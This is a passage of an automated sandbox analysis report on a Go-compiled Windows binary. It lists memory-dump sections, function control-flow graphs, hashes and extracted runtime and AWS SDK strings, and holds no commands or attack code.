            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC$delayed zeroing on data that may contain pointersruntime.reflect_makemap: unsupported map key typesweeper left outstanding across sweep generationsfully empty unfreed span set block found in resetcasgstatus: waiting for Gwaiting but is Grunnablestrings.Reader.$malloc deadlockruntime error: elem size wrong with GC progscan missed a gmisaligned maskruntime: min = runtime: inUse=runtime: max = bad panic stackrecovery failedstopm holding pstartm: m has ppreempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]mo$malloc during signalclose of nil channelinconsistent lockedmnotetsleep not on g0bad system page size to unallocated span/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=$mallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewattempt to execute system stack code on user stackcompileCallback: function argument frame too largetls: received unexpected CertificateStatus messagetls: inval$mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= $unexpected malloc header in delayed zeroing of large objectbufio.Scanner: SplitFunc returns advance count beyond inputsync: WaitGroup is reused before previous Wait has returnedreflect: reflect.Value.Elem on an invalid notinheap pointerreflect: indirection thr
            • API String ID: 0-4147802019
            • Opcode ID: eefa9318320d1e7b3210a57a63bacf3e32290bd96fc3b4f43b57ebd820d34358
            • Instruction ID: 827998a86a1b398e9ed731a4a82fa316a8784f5bbc2169a39f279e8ad276efdf
            • Opcode Fuzzy Hash: eefa9318320d1e7b3210a57a63bacf3e32290bd96fc3b4f43b57ebd820d34358
            • Instruction Fuzzy Hash: 61321572608790C2DB60EF15E4407AABB66F786B94F489116EF9D03B95DB3ACC85CF00
            Function 006A21E0 Relevance: 9.2, Strings: 7, Instructions: 474COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1090 6a21e0-6a21e4 1091 6a21ea-6a21f9 call 6aec20 1090->1091 1092 6a2b22-6a2b27 call 70ab60 1090->1092 1096 6a21fe-6a22e0 1091->1096 1092->1090 1097 6a22e2-6a22f1 call 70caa0 1096->1097 1098 6a22f5-6a2323 call 6a2b80 1096->1098 1097->1098 1103 6a2329-6a2345 1098->1103 1104 6a2532-6a2535 1098->1104 1107 6a238c-6a23b7 1103->1107 1108 6a2347-6a2369 call 6ef980 1103->1108 1105 6a253b-6a2557 1104->1105 1106 6a2742-6a2745 1104->1106 1113 6a2559-6a257b call 6ef980 1105->1113 1114 6a25a1-6a25cc 1105->1114 1111 6a274b-6a2767 1106->1111 1112 6a2893-6a28c2 call 6a2b40 1106->1112 1109 6a23b9-6a23cd call 70caa0 1107->1109 1110 6a23d1-6a2404 1107->1110 1138 6a236b-6a237a call 70caa0 1108->1138 1139 6a237e-6a2388 1108->1139 1109->1110 1119 6a241c-6a2450 1110->1119 1120 6a2406-6a2418 call 70caa0 1110->1120 1121 6a2769-6a2788 call 6ef980 1111->1121 1122 6a27a4-6a27cd 1111->1122 1150 6a28c8-6a2988 call 6a2b40 * 2 1112->1150 1151 6a2b1c-6a2b21 1112->1151 1155 6a257d-6a258f call 70caa0 1113->1155 1156 6a2593-6a259d 1113->1156 1116 6a25ce-6a25df call 70caa0 1114->1116 1117 6a25e3-6a2616 1114->1117 1116->1117 1129 6a2618-6a262d call 70caa0 1117->1129 1130 6a2631-6a2665 1117->1130 1134 6a2468-6a249c 1119->1134 1135 6a2452-6a2464 call 70caa0 1119->1135 1120->1119 1171 6a278a-6a2799 call 70caa0 1121->1171 1172 6a279d 1121->1172 1126 6a27cf-6a27e0 call 70caa0 1122->1126 1127 6a27e4-6a2815 1122->1127 1126->1127 1142 6a2831-6a2863 1127->1142 1143 6a2817-6a282d call 70caa0 1127->1143 1129->1130 1146 6a267d-6a26b1 1130->1146 1147 6a2667-6a2679 call 70caa0 1130->1147 1152 6a249e-6a24b0 call 70caa0 1134->1152 1153 6a24b4-6a24f1 1134->1153 1135->1134 1138->1139 1139->1107 1160 6a287b-6a288e 1142->1160 1161 6a2865-6a2877 call 70caa0 1142->1161 1143->1142 1164 6a26c9-6a2706 1146->1164 1165 6a26b3-6a26c5 call 70caa0 1146->1165 1147->1146 1193 6a298a-6a298e 1150->1193 1194 6a2990-6a29b2 call 6a2b60 1150->1194 1152->1153 1169 6a24f3-6a2510 call 70caa0 1153->1169 1170 6a2514-6a252a 1153->1170 1155->1156 1156->1114 1160->1112 1161->1160 1179 6a2708-6a2720 call 70caa0 1164->1179 1180 6a2724-6a273a 1164->1180 1165->1164 1169->1170 1170->1104 1171->1172 1172->1122 1179->1180 1180->1106 1195 6a29e1-6a29f7 1193->1195 1201 6a29bd-6a29bf 1194->1201 1202 6a29b4-6a29bb 1194->1202 1197 6a29fd-6a2a99 call 6a2b40 1195->1197 1198 6a2b16-6a2b1b 1195->1198 1205 6a2a9b-6a2aaa 1197->1205 1206 6a2ab1-6a2ad9 call 6a2b40 1197->1206 1204 6a29c0-6a29c2 1201->1204 1202->1204 1207 6a29d9 1204->1207 1208 6a29c4-6a29c8 1204->1208 1205->1206 1214 6a2adb-6a2ae0 1206->1214 1215 6a2ae1-6a2b15 call 6a2b40 1206->1215 1211 6a29db-6a29dd 1207->1211 1208->1207 1210 6a29ca-6a29ce 1208->1210 1210->1207 1213 6a29d0-6a29d7 1210->1213 1211->1195 1213->1211
            Strings
            • adxaesshaavxfmaintmapkey///%25Viacgodnsudpftpssh::1set204206304400500netawsacmapscurdaxdlmdmsdrsebsec2ecseksfmsfsxgeoiamiotivskmsmghmgnlexoamapiramrdsrumsdbsmssnssqsssmssostsswftaxtnbwafsepINT%s.ArnSTSRSADSAURIio.%20imgcolampyenumlnotshyregdegET, xrefs: 006A2206
            • avx512bwavx512vlCurveID(finishedexporterReceivednetedns0[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramif-rangeNO_PROXYno_proxygo/typesnet/httpgo/buildx509sha1AWS ISOFcloudhsmcodestardatabrewdatasyncdatazonedms-fipsdynamodbeks-authfinspacefire, xrefs: 006A2831
            • pclmulqdqcomplex64invalid nfuncargs(bad indirreflect: Interfacetlsrsakex%s %x %xHandshake%s %q: %sempty urlfiles,dnsdns,filesipv6-icmp_outboundlocalhostconnectexmath/randAWS Chinaaws-iso-baws-iso-eaws-iso-fca-west-1appconfigapprunnerappstreamcassandracodebuil, xrefs: 006A225F
            • avx512finvaliduintptrSwapperChanDir Value>Convertnil keyderivedInitialExpiresSubjectwindowswsarecvwsasendlookup writetocharsetos/execruntimeUnknown%v: %#xaws-isoapi.awsaccountacm-pcaairflowamplifyapi.ecrpricingappflowappmeshappsyncbedrockbudgetsiotdataglacierg, xrefs: 006A27E4
            • sse41sse42ssse3int16int32int64uint8slicetls: Earlyparsefilesimap2imap3imapspop3shosts.jsonutf-8%s*%dtext/bad nbatchcaseschimedocdblocalemailkafkaomicspipespollywafv2startcommaFLOATcache.tmp-%s/%s (%s)- %s%s.%sECDSA31000host:ARN: paraminputframeiexclpoundlaquo, xrefs: 006A2468
            • rdtscppopcntuint16uint32uint64structchan<-<-chan Value, val X25519%w%.0wAcceptServernetdnsdomaingophertelnet.localreturn.onionip+netcmd/goaws-cnathenabackupbraketcloud9configeventshealthkendralambdamacie2nimbleprotonshieldsignerstateswisdomlegacy%s: %s%s%sST, xrefs: 006A2280
            • ermssse3avx2bmi1bmi2int8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3smtpdial unixxn--aossfipsgluelogsoidcosisqldbrbins3v4xrayIPv6IPv4exprstmtskipBOOL.aws%s%sNameAWS4typeenumareametaaposquotnbspcentsectcopyordfmacrsup2sup3parasup1ordmAumlEumlIumlOuml, xrefs: 006A2241
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: adxaesshaavxfmaintmapkey///%25Viacgodnsudpftpssh::1set204206304400500netawsacmapscurdaxdlmdmsdrsebsec2ecseksfmsfsxgeoiamiotivskmsmghmgnlexoamapiramrdsrumsdbsmssnssqsssmssostsswftaxtnbwafsepINT%s.ArnSTSRSADSAURIio.%20imgcolampyenumlnotshyregdegET$avx512bwavx512vlCurveID(finishedexporterReceivednetedns0[::1]:53continue_gatewayinvalid address readfromwsaioctlunixgramif-rangeNO_PROXYno_proxygo/typesnet/httpgo/buildx509sha1AWS ISOFcloudhsmcodestardatabrewdatasyncdatazonedms-fipsdynamodbeks-authfinspacefire$avx512finvaliduintptrSwapperChanDir Value>Convertnil keyderivedInitialExpiresSubjectwindowswsarecvwsasendlookup writetocharsetos/execruntimeUnknown%v: %#xaws-isoapi.awsaccountacm-pcaairflowamplifyapi.ecrpricingappflowappmeshappsyncbedrockbudgetsiotdataglacierg$ermssse3avx2bmi1bmi2int8uintchanfuncpartcallkind on != Fromicmpigmpftpspop3smtpdial unixxn--aossfipsgluelogsoidcosisqldbrbins3v4xrayIPv6IPv4exprstmtskipBOOL.aws%s%sNameAWS4typeenumareametaaposquotnbspcentsectcopyordfmacrsup2sup3parasup1ordmAumlEumlIumlOuml$pclmulqdqcomplex64invalid nfuncargs(bad indirreflect: Interfacetlsrsakex%s %x %xHandshake%s %q: %sempty urlfiles,dnsdns,filesipv6-icmp_outboundlocalhostconnectexmath/randAWS Chinaaws-iso-baws-iso-eaws-iso-fca-west-1appconfigapprunnerappstreamcassandracodebuil$rdtscppopcntuint16uint32uint64structchan<-<-chan Value, val X25519%w%.0wAcceptServernetdnsdomaingophertelnet.localreturn.onionip+netcmd/goaws-cnathenabackupbraketcloud9configeventshealthkendralambdamacie2nimbleprotonshieldsignerstateswisdomlegacy%s: %s%s%sST$sse41sse42ssse3int16int32int64uint8slicetls: Earlyparsefilesimap2imap3imapspop3shosts.jsonutf-8%s*%dtext/bad nbatchcaseschimedocdblocalemailkafkaomicspipespollywafv2startcommaFLOATcache.tmp-%s/%s (%s)- %s%s.%sECDSA31000host:ARN: paraminputframeiexclpoundlaquo
            • API String ID: 0-3165157166
            • Opcode ID: 4c3a2bdc94b8650ee8d60f8f7be8b71c398a2039fe022de62f460598f118cb7e
            • Instruction ID: 86c5a829e8456e3a14a261512e6cf2fea52eee7ce0b9094a219687cc18718263
            • Opcode Fuzzy Hash: 4c3a2bdc94b8650ee8d60f8f7be8b71c398a2039fe022de62f460598f118cb7e
            • Instruction Fuzzy Hash: 6042BE77604B84C5E702EF26F4557993BA1F35AB84F48822ADB8E4B361DF79C5A9C300
            Function 006E1800 Relevance: 7.2, Strings: 5, Instructions: 943COMMON
            Download Yara Rule
            Strings
            • findrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruptiontrace/breakpoint trapuser defined signal 1user defined signal 2link has, xrefs: 006E276E
            • findrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of r, xrefs: 006E275D
            • global runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsaddress family not supported by protocolfailed to read custom CA bundle PEM filefailed to load custom CA bundle PEM fileerrors: target must , xrefs: 006E272A
            • findrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=strings.Reader.Seek: invalid whencenetwork dropped connection on resettransport endpoint is not connectedcan't get IEnum, xrefs: 006E273B
            • findrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid runtime symbol tableruntime: no module data for traceReg, xrefs: 006E274C
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: findrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of r$findrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid runtime symbol tableruntime: no module data for traceReg$findrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=strings.Reader.Seek: invalid whencenetwork dropped connection on resettransport endpoint is not connectedcan't get IEnum$findrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruptiontrace/breakpoint trapuser defined signal 1user defined signal 2link has$global runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsaddress family not supported by protocolfailed to read custom CA bundle PEM filefailed to load custom CA bundle PEM fileerrors: target must
            • API String ID: 0-2898966509
            • Opcode ID: 0702c8e0e9b9b3f8b5377084fee2187e5fd7c73f9aae77b707df8c16fb0c918a
            • Instruction ID: 978b49e5e8f3ad1e61f8aa341f6d2de7a4d0576a885fe24155f0b3e0696ce4ad
            • Opcode Fuzzy Hash: 0702c8e0e9b9b3f8b5377084fee2187e5fd7c73f9aae77b707df8c16fb0c918a
            • Instruction Fuzzy Hash: E692C13260ABC586EB758F16E4903DAB366F78AB90F45512ACB8D07B54DF3CC885CB40
            Function 006D7160 Relevance: 4.0, Strings: 3, Instructions: 273COMMON
            Download Yara Rule
            Strings
            • runtime.preemptM: duplicatehandle failedglobal runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsaddress family not supported by protocolfailed to read custom CA bundle PEM filefailed to load custo, xrefs: 006D75EF
            • self-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchinvalid slothost is downillegal seekGetLengthSidGetLastErrorGetStdHandleGetTempP, xrefs: 006D7605
            • runtime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=syscall: string with NUL passed to StringToUTF16credential type %s requires role_arn, profile %sclient region does not match provided ARN regionbufio: writer return, xrefs: 006D75C7
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
